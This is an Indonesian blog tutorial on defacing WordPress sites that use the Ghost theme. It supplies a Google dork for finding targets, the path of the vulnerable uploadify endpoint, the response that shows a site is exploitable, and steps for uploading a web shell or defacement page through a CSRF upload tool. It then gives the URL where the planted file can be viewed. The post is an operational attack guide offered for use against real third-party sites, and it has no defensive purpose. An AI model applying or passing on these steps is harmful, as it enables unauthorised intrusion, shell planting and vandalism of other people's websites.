Tutorial Deface Metode Wp - Ghost Themes- Razzer Hacker
Rabu, 26 Februari 2020
Bahan Bahan Yang Kalian Perlukan :
- Hp/Pc.
- Internet.
- Sc Deface/Shell.
- Tools CSRF.
#Untuk Dork Nya :
inurl:wp-content/themes/Ghost/
#Exploit :
/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
Step By Step :
1. Kalian dorking dulu di google.
2. Setelah kalian dorking pilih salah 1 web.
3. Lalu kalian tambahkan exploit nya di belakang url nya.
Contoh:
http://razzerhacker.blogspot.com/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
Nah nanti ada bacaan {"status":"NOK", "ERR":"This file is incorect"}. Nah itu tanda nya VULN ya sobat.
Contoh gambar di bawah.
4. Nah kalo error itu tanda nya VULN teman teman lalu kalian pergi ke Tools CSRF nya (Klik Disini).
Nah klo sudah ke Tools CSRF Maka di bagian :
URL : Isi dengan target kalian yang tadi error.
POST FILE : Isi dengan (Filedata).
Lalu Klik Kunci Target.
Nah nanti kalian bakal di suruh up sc atau shell jika web nya support up shell maka up shell aja tapi klo kga support up shell up sc tercinta kalian aja:v
5. Nah nanti ada bacaan {"status":"OK","imageID":"NamaScKalian","imageName":"NamaScKalian","html":"\n\t\n\t\t
html File<\/div><\/td>\n\t\tNamaScKalian.html
\n\t\t\t[Delete]<\/a>\n\t\t<\/td>\n\t<\/tr>\n"}
Nah itu tanda nya Success.
Contoh gambar di bawah.
6. Lalu gimana cara manggil sc nya mass? hooh mudah kok tinggal kalian tambahkan wp-content/uploads/settingsimages/nama Sc kalian.html di belakang site.
Contoh :
http://razzerhacker.blogspot.com/wp-content/uploads/settingsimages/nama Sc kalian.html
Dan lihat hasil nya kepepes jga:v
Sekian artikel kali ini Tutorial Deface Metode Wp - Ghost Themes. Apa bila ada kritik dan saran kalian bisa komen di bawah.